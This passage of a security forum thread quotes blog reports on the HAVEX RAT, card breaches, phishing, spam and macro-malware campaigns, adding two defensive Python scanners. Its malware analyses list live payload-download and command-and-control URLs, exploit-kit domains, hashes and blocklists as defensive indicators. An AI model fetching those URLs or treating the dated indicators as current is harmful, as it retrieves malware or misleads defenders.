- The file TMPProvider023.dll, as indicated above, with the number indicating the version of this HAVEX RAT (v023)
- A dropped file named 34CD.tmp.dll, detected as BKDR_HAVEX.SM. At this point, the file is being repeatedly detected and quarantined by the installed Trend Micro product. This was later found out to be version 29 or v029 of HAVEX.
- C&C communication from the host and back
... a 64-bit file, was upgraded to a 32-bit v029 HAVEX RAT. This now brings us to four files that seem to be interrelated in one single infection, as seen below:
File name SHA1 Compile Date Architecture
%TEMP%\TMPprovider023.dll 997C0EDC9E8E67FA0C0BC88D6FDEA512DD8F7277 2012-10-03 AMD64
%TEMP%\34CD.tmp.dll CF5755D167077C1F8DEEDDEAFEBEA0982BEED718 2013-04-30 I386
%TEMP%\734.tmp.dll BFDDB455643675B1943D4E33805D6FD6884D592F 2013-08-16 I386
%TEMP%\4F2.tmp.dll 8B634C47087CF3F268AB7EBFB6F7FBCFE77D1007 2013-06-27 I386
... In this particular infection, the v023 HAVEX file was using the same command-and-control server as that of the v029 HAVEX file... Currently, we have seen at least four IP addresses communicating to the command-and-control server, two of which have exhibited the behavior of upgrading the version of the C&C module of the HAVEX RAT... the HAVEX RAT has gone through several iterations—used in campaigns with ICS/SCADA and even pharmaceutical targets, nothing prevents it from being used again and again. ICS operators have to take note that the structure of the HAVEX binaries resemble much of what we see in common Windows malware – more so now that we’ve seen Windows 7 64-bit infections. It is thereby important to validate software being installed on endpoints within the environment, and to frequently monitor HTTP traffic..."
(More detail at the trendmicro URL at the top of this post.)
* Havex infection (ICS)/SCADA systems chain:
> http://about-threats.trendmicro.com/resources/images/HAVEX_2.jpg
:mad: :fear:
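The HAVEX post above gives two host indicators a defender can act on: the TMPprovider0NN.dll / NNNN.tmp.dll file names in %TEMP%, and the SHA1 values in its table, with the new point that one build is AMD64. As an added example, not Trend Micro's code, the scanner below walks a directory, matches those name patterns, compares SHA1 against the table's hashes and reads the architecture from the PE COFF header; the sample directory and its stub PE files are constructed for the demo.

```python
# Added example (not Trend Micro's code): scan a directory for the HAVEX
# indicators described above (TMPprovider0NN.dll / NNNN.tmp.dll in %TEMP%),
# hash each hit and read the PE machine type, since the post's point is that a
# 64-bit (AMD64) build now exists alongside the I386 ones.
import hashlib
import os
import re
import tempfile

# SHA1 values from the table in the post above.
KNOWN_SHA1 = {
    "997c0edc9e8e67fa0c0bc88d6fdea512dd8f7277",  # TMPprovider023.dll, AMD64
    "cf5755d167077c1f8deeddeafebea0982beed718",  # 34CD.tmp.dll, I386
    "bfddb455643675b1943d4e33805d6fd6884d592f",  # 734.tmp.dll, I386
    "8b634c47087cf3f268ab7ebfb6f7fbcfe77d1007",  # 4F2.tmp.dll, I386
}
NAME_PATTERNS = [
    re.compile(r"^tmpprovider0\d{2}\.dll$", re.IGNORECASE),  # C&C component
    re.compile(r"^[0-9a-f]{1,4}\.tmp\.dll$", re.IGNORECASE),  # dropped modules
]
MACHINE = {0x14C: "I386", 0x8664: "AMD64"}  # IMAGE_FILE_MACHINE_* values


def sha1_hex(data):
    return hashlib.sha1(data).hexdigest()


def pe_machine(data):
    """Architecture from the PE COFF header, or None if not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine = int.from_bytes(data[e_lfanew + 4:e_lfanew + 6], "little")
    return MACHINE.get(machine, hex(machine))


def name_matches(name):
    return any(p.match(name) for p in NAME_PATTERNS)


def scan_dir(path, known=KNOWN_SHA1):
    """Findings (sorted by file name) for files matching name or hash IoCs."""
    findings = []
    for entry in os.scandir(path):
        if not entry.is_file():
            continue
        with open(entry.path, "rb") as fh:
            data = fh.read()
        digest = sha1_hex(data)
        by_name = name_matches(entry.name)
        by_hash = digest in known
        if by_name or by_hash:
            findings.append({"file": entry.name, "sha1": digest, "name_match": by_name,
                             "hash_match": by_hash, "arch": pe_machine(data)})
    return sorted(findings, key=lambda f: f["file"])


def fake_pe(machine):
    """Constructed minimal PE header with the given Machine field (demo only)."""
    hdr = bytearray(b"MZ" + b"\0" * 62)
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")  # e_lfanew -> PE signature
    return bytes(hdr) + b"PE\0\0" + machine.to_bytes(2, "little") + b"\0" * 18


def demo(extra_known=()):
    """Build a constructed sample directory, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        samples = {"TMPprovider023.dll": fake_pe(0x8664),   # name IoC, 64-bit
                   "34CD.tmp.dll": fake_pe(0x14C),          # name IoC, 32-bit
                   "notes.txt": b"clean text, not an indicator"}
        for name, content in samples.items():
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(content)
        return scan_dir(tmp, KNOWN_SHA1 | set(extra_known))


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```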
AplusWebMaster
2014-12-30, 23:01
FYI...
'Worm' removed at hacked South Korea nuclear operator
- http://www.reuters.com/article/2014/12/30/us-nuclear-southkorea-cybersecurity-idUSKBN0K80J620141230
Dec 30, 2014 - "South Korean authorities have found evidence that a low-risk computer "worm" had been removed from devices connected to some nuclear plant control systems, but no harmful virus was found in reactor controls threatened by a hacker. Korea Hydro & Nuclear Power Co Ltd said it would beef up cyber security by hiring more IT security experts and forming an oversight committee, as it came in for fresh criticism from lawmakers following recent hacks against its headquarters. The nuclear operator, part of state-run utility Korea Electric Power Corp, said earlier this month that non-critical data had been stolen from its systems, while a hacker threatened in Twitter messages to close three reactors. The control systems of the two complexes housing those reactors had not been exposed to any malignant virus, Seoul's energy ministry and nuclear watchdog said in a joint statement on Tuesday, adding the systems were -inaccessible- from external networks. The nuclear plant operator said on Tuesday it was increasing the number of staff devoted to cyber security from 53 to around 70, and would set up a committee of internal and external experts to oversee security..."
___
Target hacks hit OneStopParking .com
- http://krebsonsecurity.com/2014/12/target-hackers-hit-onestopparking-com/
Dec 30, 2014 - "Parking services have taken a beating this year at the hands of hackers bent on stealing credit and debit card data. This week’s victim — onestopparking .com — comes compliments of the same organized crime gang thought to be responsible for stealing tens of millions of card numbers from shoppers at Target and Home Depot. Late last week, the cybercrime shop best known for being the first to sell cards stolen in the Target and Home Depot breach moved a new batch of cards taken from an unknown online merchant. Several banks contacted by KrebsOnSecurity acquired cards from this batch, and determined that all had one thing in common: They’d all been used at onestopparking .com, a Florence, Ky. based company that provides low-cost parking services at airport hotels and seaports throughout the United States. Contacted about the suspicious activity that banks have traced back to onestopparking .com, Amer Ghanem, the site’s manager, said the company began receiving complaints from customers about a week before Christmas...
Cards from the “Solidus” base at Rescator map back to One Stop Parking
> http://krebsonsecurity.com/wp-content/uploads/2014/12/solidus-600x291.png
This was the second time in as many weeks that this cybercrime shop –Rescator[dot]cm — has put up for sale a batch of credit cards stolen from an online parking service: On Dec. 16, KrebsOnSecurity reported that the same shop was selling cards stolen from Park-n-Fly, a competing airport parking reservation service. Sometime over the past few days, Park-n-Fly announced it was suspending its online service... a security update posted on the company’s site*. Park ‘N Fly noted that it is still taking reservations over the phone... Last month, SP Plus — a Chicago-based parking facility provider — said** payment systems at 17 parking garages in Chicago, Philadelphia and Seattle were -hacked- to capture credit card data after thieves installed malware to access credit card data from a remote location. Card data stolen from those SP+ locations ended up for sale on a competing cybercrime -store- called Goodshop. In Missouri, the St. Louis Parking Company recently disclosed*** that it learned of a breach involving card data -stolen- from its Union Station Parking facility between Oct. 6, 2014 and Oct. 31, 2014."
* http://www.pnf.com/security-update/
** http://www.qconline.com/news/illinois/parking-garages-hacked-for-credit-card-data/article_dabd4256-2aa2-5005-b09e-30feecb95eb1.html
*** http://stlouisparking.com/press-release/
___
Instagram Profile Deletion Hoax
- https://blog.malwarebytes.org/fraud-scam/2014/12/january-1st-instagram-profile-deletion-hoax/
Dec 30, 2014 - "... accounts on Instagram claiming a mass purge is coming on January 1, 2015 unless your account is “verified”, with the aid of a so-called Verification Arrow. Profiles such as the one below (with 110k followers at time of writing) are receiving a fair amount of traction with between 5,000-8,000 likes per image (I got 6 for a picture of a cat once), stating:
If your account doesn't have a picture of an arrow next to it then it's in the process of being deleted. To get your arrow, please follow the instructions below
1) Follow @verifyingarrows
2) Repost our photo
3) Tag @verifyingarrows
4) Hashtag #verifyingarrows
Screenshot: https://blog.malwarebytes.org/wp-content/uploads/2014/12/instaarrow2.jpg
Here’s a similar profile – now deleted – which managed to grab 245k followers before being banned itself:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/instaarrow1.jpg
The “arrow” in question appears to be nothing more than a drop down box on profiles which suggests accounts similar to the one you’re looking at. It has -nothing- to do with profile verification or dodging deletion waves. Regardless, panicked Instagram users appear to be jumping on the ban(d)wagon and doing what they can to fend off a profile extinction event that is never going to arrive. In terms of what the ultimate end game is with all of this, it’s a case of wait and see for the time being. This is either just a -hoax- for the sake of it, or maybe the accounts asking people to bolster their visibility on Instagram will suddenly start selling something come the New Year. Whatever they’re up to, you can safely -ignore- these profiles and carry on taking selfies and pictures of sandwiches, with or without a filter."
___
Apple Store 'Transaction Cancellation Form' Phish...
- http://www.hoax-slayer.com/apple-store-transaction-cancellation-phishing-scam.shtml
Dec 30, 2014 - "According to this email, which purports to be from Apple, you have purchased a TomTom from the Apple Store (GPS car navigation system). The email explains that, if you did not authorise the TomTom purchase, you should click-a-link-to-access an Apple Store Transaction Cancellation Form. Supposedly, by filling in the form, the purchase will be cancelled and you will receive a full refund. However, the email is -NOT- from Apple and the claim that you have bought a Tom Tom is just a ruse designed to trick you into clicking the 'cancel' link.
Clicking the link takes you to a website that hosts a -fake- Apple Store 'Cancellation' form. The -fake- form asks you to provide name and contact details as well as your credit card and banking information.
Clicking the 'Cancel Transaction' button will send all of your information to criminals who can then use it to commit financial -fraud- and identity theft.
The scammers bank on the fact that at least a few recipients of the email will be -panicked- into clicking the link and supplying their information in the mistaken belief that someone has made fraudulent purchases in their name."
> http://www.hoax-slayer.com/images/apple-store-transaction-cancellation-phishing-scam-1.jpg
:fear::fear: :mad:
AplusWebMaster
2014-12-31, 21:59
FYI...
'NetGuard Toolbar' SPAM
- http://blog.dynamoo.com/2014/12/netguard-toolbar-ngcmpcom-spam.html
31 Dec 2014 - "Sometimes a spam comes through and it isn't immediately obvious what they are trying to do:
From: Brad Lorien [bclorien@ ngcmp .com]
Date: 31 December 2014 at 01:12
Subject: Real estate (12/30/2014)
Our company reaches an online community of almost 41 million people,
who are mostly US and Canadian based. We have the ability to present
our nearly 41 million strong network with a best, first choice when
they are looking online for what your company does.
We are seeking a preferred choice to send our people who are looking
for real estate in Abilene and surrounding markets.
I’m in the office weekdays from 9:00 AM to 5:00 PM Pacific time.
Best regards,
Brad Lorien
Network Specialist, SPS EServices
Phone: (877) 489.2929, ext. 64
There is no link or attachment in the email. So presumably the spammer is soliciting replies to the email address bclorien@ ngcmp .com which is a valid address. The domain ngcmp.com uses a mail server mail.ngcmp .com to receive email messages, hosted on 38.71.66.127 (PSInet / Virtual Empire, US)... the spam was sent via a relay at 38.71.66.126 which is one IP different from the server handling incoming mail, which pretty much firmly identifies that whoever controls the ngcmp .com domain is actually sending the spam. The mail headers also identify the originating IP as well as the relay, which is a Verizon Wireless customer at 75.215.49.211, possibly someone sending spam using throwaway cell phones to avoid being traced. An examination of those two PSInet addresses shows the following domains are associated with them:
ncmp .co
ngmp .co
ngcmp .com
ng-portal .com
ngcmp .net
ng-central .net
luxebagscloset .com
reviewwordofmouth .com
All of these domains have -anonymous- WHOIS details, but you can see that there is a common pattern here. I don't recommend that you visit spam sites... I did in this case to see what it was about:
> https://2.bp.blogspot.com/-HeHlNoeUd6U/VKPab3DijjI/AAAAAAAAGEU/GhzY1GyW6ok/s1600/netguard.png
This is basically -adware- . Going back to the original spam message, these "41 million people" are presumably suckers who have downloaded this crap, and NG Systems are busy spamming out to find more low-life advertisers to fill up their network... Predictably, there seems to be -no- such corporation as "NG Systems", but if you download the Toolbar it turns out it is digitally -signed- by a company called "IP Marketing Concepts, Inc." ... The executable itself is tagged by only one AV engine* as malicious, but VirusTotal does note that it looks like a PUA. Malwr notes** that individual components appear to be Russian in origin. So all in all, this spam is being sent out by a company that goes a very, very long way to disguise its origins..."
* https://www.virustotal.com/en/file/75bd42a0ce57389cdbbcc0db9c0221e041a3a56612068a02da8425a5d860b132/analysis/1420024818/
** https://malwr.com/analysis/ZjdjZDYzMzVlZTkzNDAwM2E2Y2U1NzRjNTUyNjhmNjM/
___
PUP borrows tricks from malware authors
- https://blog.malwarebytes.org/fraud-scam/2014/12/potentially-unwanted-program-borrows-tricks-from-malware-authors/
Dec 31, 2014 - "... These days it is getting harder and harder to download a program from its official source, in its original format, without additional pieces of software bundled to it:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/back-965x395.png
Companies specializing in so-called ‘download assistants’ or ‘download managers’ claim that they:
Provide a value added service to users by suggesting additional programs tailored to the users’ needs.
Offer a way for software manufacturers to monetize their free applications.
Let’s have a look for ourselves by checking an installer for the Adobe Flash Player. The details are as follows:
Name: adobe_flash_setup.exe
Size: 809.0 KB
MD5: d549def7dd9006954839a187304e3835
imphash: 884310b1928934402ea6fec1dbd3cf5e
Out of the box: The first thing we noticed was that the program behaves differently whether it is launched on a real physical machine or a Virtual Machine:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/schema-1024x782.png
In a VM such as VirtualBox, the installer skips all the bundled offers and goes straight for the Flash Player... There might be a few reasons for this:
To avoid unnecessary impressions and installs on ‘fake’ systems that would skew metrics.
To appear as a ‘clean’ installer when installed on automated sandboxes or by hand from security researchers.
Anti-vm behavior does not necessarily mean that the application is malicious, but it -is- something that many malware authors use... The certificate details show that said company is located in Tel Aviv, Israel and a VirusTotal scan* hints at a connection with InstallCore, a “digital content delivery platform”... There are also various other offers bundled in this installer, courtesy of “distributer” called Entarion Ltd., with an “address” conveniently located in Cyprus, well-known as a safe haven for offshore companies... Malwarebytes’ criteria for listing a program as a PUP can be viewed here**. The list is pretty thorough and will most likely continue to evolve as PUP makers diversify their operations. Consumers should be able to make educated choices rather than being misled down a path that they didn’t intend to take..."
* https://www.virustotal.com/en/file/7ecf874ceba964fdc32e989e7c706b3f3e28cbfa906c7f371a24cbae11276d0b/analysis/
** https://www.malwarebytes.org/pup/
:fear: :mad:
AplusWebMaster
2015-01-02, 02:35
FYI...
Evil network: 217.71.50.0/24 / ELTAKABEL-AS / TXTV d.o.o. Tuzla / aadeno@ inet .ba
- http://blog.dynamoo.com/2014/12/evil-network-2177150024-eltakabel-as.html
31 Dec 2014 - "This post by Brian Krebs* drew my attention to a block of Bosnian IP addresses with an unusually bad reputation. The first clue is given by Google's safe browsing diagnostics**..
** http://www.google.com/safebrowsing/diagnostic?site=AS:198252
Some of those domains rang a bell to do with recent malware attacks. One odd thing that struck me was that this is a sparsely populated but relatively large*** collection of IP addresses that appear to be mostly allocated to broadband customers rather than web hosts. An investigation into what was lurking in this AS highlighted a problem block of 217.71.50.0/24 which contains very -many- bad sites...
*** http://bgp.he.net/AS198252#_prefixes
... appears to be a block suballocated to someone using the email address aadeno@ inet .ba. I took a look at the sites hosted in this /24... There are 37 malicious websites (identified by Google) out of 185 that I found in this network range. The usual level of badness tends to be around 1%, but here it is 20%. Looking at the domains, it appears that there is nothing at all of value here and you can probably count them all as malicious.
Recommended blocklist:
217.71.50.0/24 ..."
(Long list at the dynamoo URL at the top.)
* http://krebsonsecurity.com/2014/12/lizard-kids-a-long-trail-of-fail/
:fear::fear: :mad:
AplusWebMaster
2015-01-02, 15:00
FYI...
binarysmoney .com / clickmoneys .com / thinkedmoney .com "job" SPAM
- http://blog.dynamoo.com/2015/01/binarysmoneycom-clickmoneyscom.html
2 Jan 2015 - "I've been plagued with these for the past few days:
Date: 2 January 2015 at 11:02
Subject: response
Good day!
We considered your resume to be very attractive and we thought the vacant position in our company could be interesting for you.
We cooperate with different countries and currently we have many clients in the world.
Part-time and full-time employment are both currently important.
We offer a flat wage from $1500 up to $5000 per month.
The job offers a good salary so, interested candidates please registration on the our site: www .binarysmoney .com
Attention! Accept applications only on this and next week.
Respectively submitted
Personnel department
Subject lines include:
New employment opportunities
Staff Wanted
Employment invitation
new job
New job offer
Interesting Job
response
Spamvertised sites seen so far are binarysmoney .com, clickmoneys .com and thinkedmoney .com, all multihomed on the following IPs:
46.108.40.76 (Adnet Telecom / "Oancea Mihai Gabriel Intreprindere Individuala", Romania)
201.215.67.43 (VTR Banda Ancha S.A., Chile)
31.210.63.94 (Hosting Internet Hizmetleri Sanayi Ve Ticaret Anonim Sirketi, Turkey)
Another site hosted on these IPs is moneyproff .com. All the domains have apparently -fake- WHOIS details.
It looks like a money mule spam, but in fact it leads to some binary options trading crap.
> http://2.bp.blogspot.com/-91ORuyJxnpU/VKZ0LXPbKMI/AAAAAAAAGFA/cngzfgKroWg/s1600/binary-options.jpg
... that's just a Shutterstock stock photo that is pretty widely used on the web. In fact, everything about this whole thing is a cookie-cutter site with text and images copied from elsewhere. Binary options are a haven for scammers, and my opinion is that this is such a -scam- given the spammy promotion and hidden identity of the operators. I would recommend that you avoid this and also block traffic to the following IPs and domains:
46.108.40.76
201.215.67.43
31.210.63.94
clickmoneys .com
thinkedmoney .com
binarysmoney .com
moneyproff .com"
:fear::fear: :mad:
AplusWebMaster
2015-01-03, 19:31
FYI...
Fake 'Thank you' SPAM - malware
- http://myonlinesecurity.co.uk/thank-buying-acrobat-xi-pro-malware/
3 Jan 2015 - "'Thank you for buying from Acrobat XI Pro' pretending to come from Plimus Sales <receipt@ plimus .com> with a link to a malicious website is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Plimus is a genuine affiliate marketing service/reseller/payment gateway for many software companies including Adobe. If you look carefully at the email, you can see the links are to IPLIMUS -not- plimus...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Thank-you-for-buying-from-Acrobat-XI-Pr.jpg
3 January 2015: adbx1pro.exe : | Current Virus total detections: 25/56*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8e06e0f9ceca9896713b2d54b6f3d05a981ed370a39f4bd8560df6ab369d3fb5/analysis/1420298571/
:fear::fear: :mad:
AplusWebMaster
2015-01-05, 15:53
FYI...
Phish - 'Tesco Important Notification' ...
- http://myonlinesecurity.co.uk/tesco-important-notification-phishing/
5 Jan 2015 - "'Tesco Important Notification' pretending to come from Tesco .com offering you -free- Tesco vouchers is one of the latest -phish- attempts to steal your Tesco bank Account and your other personal details. This one wants your personal details, Tesco log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well. If you are unwise enough to fill in the personal details and security questions, there is a very high likelihood that information could be used to compromise any other account or log in ANYWHERE on the net... don’t ever click the link in the email. If you do it will lead you to a website that looks at first glance like the genuine Tesco -bank- website but you can clearly see in the address bar, that it is -fake- ... Some versions of this -phish- will ask you fill in the html ( webpage) form that comes attached to the email...
If you follow the link you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers1-1024x606.jpg
Then you get a page asking for password and Security number:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers2-1024x534.jpg
After you fill in your Security number and password you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers3-1024x746.jpg
Then they send you to this page and eventually it auto redirects you to the genuine Tesco bank site:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers4-1024x625.jpg
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... whether it is a straightforward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details. Be very careful when unzipping them and make sure you have “show known file extensions enabled”, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened."
:fear: :mad: :fear:
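Both the 'Thank you' post and the Tesco post above come back to the same check: look at what the attachment really is, not at its icon or at the name shown with known extensions hidden. The script below is an added example (my code, not from myonlinesecurity.co.uk or the posts). It compares the declared extension against the leading bytes, catches "name.pdf.exe" double extensions, and looks inside zip-based attachments (.zip and the OOXML .docx/.xlsx/.docm containers) for executables and for the standard vbaProject.bin macro part. All sample byte strings and names are constructed.

```python
"""Flag e-mail attachments whose name or icon hides an executable.

Added example (not code from the quoted posts). It checks an
attachment's declared extension against its leading bytes, catches
'name.pdf.exe' double extensions, and looks inside zip-based
attachments for executables and VBA macro projects.
Every sample byte string below is constructed.
"""
import io
import zipfile
from typing import List

PE_MAGIC = b"MZ"            # Windows executable, whatever icon it carries
ZIP_MAGIC = b"PK\x03\x04"   # .zip, and also .docx/.xlsx/.docm containers

# Extensions Windows runs directly on double-click.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}


def declared_extension(name: str) -> str:
    """Last extension of a (possibly path-qualified) name, lower-cased."""
    base = name.rsplit("/", 1)[-1]
    return "." + base.rsplit(".", 1)[-1].lower() if "." in base else ""


def check_attachment(name: str, data: bytes) -> List[str]:
    """Return findings for one attachment; an empty list means nothing suspicious."""
    findings = []
    ext = declared_extension(name)
    parts = name.lower().rsplit("/", 1)[-1].split(".")

    if data.startswith(PE_MAGIC):
        # The content is a PE executable no matter what the name suggests;
        # this is the "spoofed icon" case the posts describe.
        if ext in EXECUTABLE_EXTS:
            findings.append(f"{name}: executable attachment")
        else:
            findings.append(f"{name}: PE executable disguised as {ext or 'no extension'}")
    elif ext in EXECUTABLE_EXTS:
        findings.append(f"{name}: executable extension")

    # 'invoice.pdf.exe' is shown as 'invoice.pdf' when known extensions are hidden.
    if len(parts) >= 3 and "." + parts[-1] in EXECUTABLE_EXTS:
        findings.append(f"{name}: double extension hides executable")

    if data.startswith(ZIP_MAGIC):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for member in zf.namelist():
                    if member.lower().endswith("vbaproject.bin"):
                        # Standard OOXML part that holds VBA macros (word/ or xl/).
                        findings.append(f"{name}: contains macro project {member}")
                    for f in check_attachment(member, zf.read(member)):
                        findings.append(f"{name} -> {f}")
        except zipfile.BadZipFile:
            findings.append(f"{name}: corrupt or truncated archive")
    return findings


def build_zip(members) -> bytes:
    """Constructed in-memory zip used as sample input."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for member_name, member_data in members:
            zf.writestr(member_name, member_data)
    return buf.getvalue()


# Constructed samples: a "PDF" that is really a PE, and a zipped double-extension file.
FAKE_PDF = ("Thank-you-for-buying.pdf", PE_MAGIC + b"\x90\x00" * 30)
ZIPPED_EXE = ("attachment.zip",
              build_zip([("invoice.pdf.exe", PE_MAGIC + b"\x00" * 60),
                         ("readme.txt", b"constructed sample")]))

if __name__ == "__main__":
    for sample_name, sample_bytes in (FAKE_PDF, ZIPPED_EXE):
        for finding in check_attachment(sample_name, sample_bytes) or ["no findings"]:
            print(finding)
```

The magic-byte test is deliberately done before the extension test: a PE file is a PE file even when it is called something.pdf, which is exactly the case the posts describe. Mail gateways that only key on the declared extension miss it.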
AplusWebMaster
2015-01-06, 15:26
FYI...
hqq .tv serving up Exploit kit (via Digital Ocean and Choopa)
- http://blog.dynamoo.com/2015/01/hqqtv-serving-up-exploit-kit-via.html
6 Jan 2014 - "... here's an infection chain starting from a scummy-looking video streaming site called cine-stream .net. I do not recommend visiting any of the sites labelled [donotclick]
Step 1
[donotclick]cine-stream .net/1609-le-pre-nol-est-une-ordure-en-streaming.html
89.248.170.206 (Ecatel Ltd, Netherlands)
URLquery report: http://urlquery.net/report.php?id=1420561240827
Step 2
[donotclick]hqq .tv/player/embed_player.php?vid=7SO84O65X5SM&autoplay=no
199.83.130.198 (Incapsula, US)
Step 3
[donotclick]agroristaler .info/dasimotulpes16.html
128.199.48.44 (Digital Ocean, Netherlands)
URLquery report: http://urlquery.net/report.php?id=1420561209263
Step 4
[donotclick]aflesministal .info/chat.html
178.62.147.144 (Digital Ocean, Netherlands)
128.199.52.108 (Digital Ocean, Netherlands)
Step 5
[donotclick]pohfefungie .co.vu/VUZQBUgAAgtAGlc.html
[donotclick]eixaaweexum .co.vu/VxFVBkgAAgtAGlc.html
108.61.165.69 (Choopa LLC / Game Servers, Netherlands)
URLquery report: http://urlquery.net/report.php?id=1420560803160
The Digital Ocean and Choopa IPs host several apparently malicious domains:
108.61.165.69
eixaaweexum .co.vu
ienaakeoke .co.vu
weswalkers .co.vu
pohfefungie .co.vu
vieleevethu .co.vu
178.62.147.144
128.199.52.108
sebitibir .info
abrisgalor .info
aflesministal .info
128.199.48.44
abibruget .info
alsonutird .info
fiflakutir .info
fistikopor .info
agroristaler .info
poliloparatoser .info
In my opinion, .co.vu domains are often bad news and are good candidates for blocking. In the meantime I would recommend the following -minimum- blocklist:
108.61.165.69
178.62.147.144
128.199.52.108
128.199.48.44 "
___
Fake 'National Payments Centre' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-sgbd-national-payments.html
6 Jan 2015 - "This -fake- financial spam has a malicious payload:
Date: 6 January 2015 at 08:56
Subject: This is your Remittance Advice #ATS29858
DO NOT REPLY TO THIS EMAIL ADDRESS
Please find attached your remittance advice from Saint Gobain UK.
For any queries relating to this remittance please notify the Payment Enquiry Team on 01484913947
Regards,
SGBD National Payments Centre
Note that this email is a forgery. Saint Gobain UK are -not- sending the spam, nor have their systems been compromised in any way. Instead, criminals are using a -botnet- to spam out malicious Excel documents. Each email has a different reference number, and the attachment file name matches. The telephone number is randomly generated in each case, using a dialling code of 01484 which is Huddersfield (in the UK). There will probably be a lot of confused people in Huddersfield at the moment.
There are actually four different versions of the -malicious- Excel file, none of which are detected by anti-virus vendors [1] [2] [3] [4] containing four different but similar macros... which then download a component from one of the following locations:
http ://213.174.162.126:8080 /mans/pops.php
http ://194.28.139.100:8080 /mans/pops.php
http ://206.72.192.15:8080 /mans/pops.php
http ://213.9.95.58:8080 /mans/pops.php
This file is downloaded as test.exe and is then saved as %TEMP%\1V2MUY2XWYSFXQ.exe. It has a VirusTotal detection rate of just 3/48*. That report shows that the malware then connects to the following URLs:
http ://194.146.136.1:8080/
http ://179.43.141.164/X9BMtSKOfaz/e&WGWM+o%3D_c%26%248/InRRqJL~L
http ://179.43.141.164/TiHlXjsnCOo8%2C/fS%24P/VZFrel2ih%2Dlv+%26aTn
http ://179.43.141.164/suELl1XsT%2CFX.k%26z4./sn%3F=/%3Ffw/HFBN@8J
http ://179.43.141.164/fhmhi/igm/c&@%7E%2Dj.==m~cg_%2B%2C%3Daggs.%2Dkgm%26$~@fk@g/a%2Cgm+lkb%2D.~$kh/
194.146.136.1 is allocated to PE "Filipets Igor Victorovych" in Ukraine. 179.43.141.164 is Private Layer Inc in Panama. I would definitely recommend blocking them and possibly the entire /24s in which they are hosted. The Malwr report shows no activity, indicating that it is hardened against analysis.
Recommend blocklist:
194.146.136.1
179.43.141.164
213.174.162.126
194.28.139.100
206.72.192.15
213.9.95.58 "
[1] https://www.virustotal.com/en/file/71fbb660463658b2b4d1da37286d66eba65c9732bd2c1ce1a4834071eca03451/analysis/1420539739/
[2] https://www.virustotal.com/en/file/48ae571eb549056c3f6ff192c3dac181d3c9ef1f78b6ea8cca0baefdcacf0bc7/analysis/1420539746/
[3] https://www.virustotal.com/en/file/11a175b70117924b4b7b547277e283408bb2777db0835c774352d4344bbea86f/analysis/1420539753/
[4] https://www.virustotal.com/en/file/fa4b67f24b7dfda876fbc9fd9fd127048c5799fd005f07a904fa02cff04e8efd/analysis/1420539759/
* https://www.virustotal.com/en/file/eca46cc3a36df9c32dbe967298ddc1f6ee6790179a87b4e17d1d9b0e4bbbf87c/analysis/1420540311/
- http://myonlinesecurity.co.uk/sgbd-national-payments-centre-remittance-advice-excel-xls-malware/
6 Jan 2015
___
Fake 'PAYMENT ADVICE' malware SPAM
- http://blog.dynamoo.com/2015/01/payment-advice-06-jan-2015-malware-spam.html
6 Jan 2015 - "This spam has a malicious attachment:
From: Celeste , Senior Accountant
Date: 6 January 2015 at 10:13
Subject: PAYMENT ADVICE 06-JAN-2015
Dear all,
Payment has been made to you in amount GBP 18898,28 by BACS.
See attachment.
Regards,
Celeste
Senior Accountant
I have only seen one sample so far, with a document BACS092459_473.doc which has a VirusTotal detection rate of 0/56* and which contains this macro... which attempts to download an additional component from:
http ://206.72.192.15:8080 /mans/pops.php
This is exactly the same file as seen in this parallel spam run** today and it has the same characteristics."
* https://www.virustotal.com/en/file/56d6b5053ad57f94ab73ff3b57a3aed5cf336f1600986e8a3634f2840602e215/analysis/1420543064/
** http://blog.dynamoo.com/2015/01/malware-spam-sgbd-national-payments.html
- http://myonlinesecurity.co.uk/senior-accountant-payment-advice-06-jan-2015-word-doc-malware/
6 Jan 2015
___
MS warns of new malware attacks w/ Office docs
- http://www.techworm.net/2015/01/microsoft-warns-new-malware-attacks-office-documents.html
Jan 5, 2015 - "Microsoft has warned its Microsoft Office users of a significant rise in malware attacks through macros in Excel and Word programs. In a report published on its blog*, Microsoft says that there is more than a threefold jump in the malware campaigns spreading two different Trojan downloaders. These Trojan downloaders arrive in -emails- masquerading as orders or invoices. The malware is being spread through spam emails containing the following subject lines, according to Microsoft:
ACH Transaction Report
DOC-file for report is ready
Invoice as requested
Invoice – P97291
Order – Y24383
Payment Details
Remittance Advice from Engineering Solutions Ltd
Your Automated Clearing House Transaction Has Been Put On ...
...the attachment containing Adnel and Tarbir campaigns is usually named as follows:
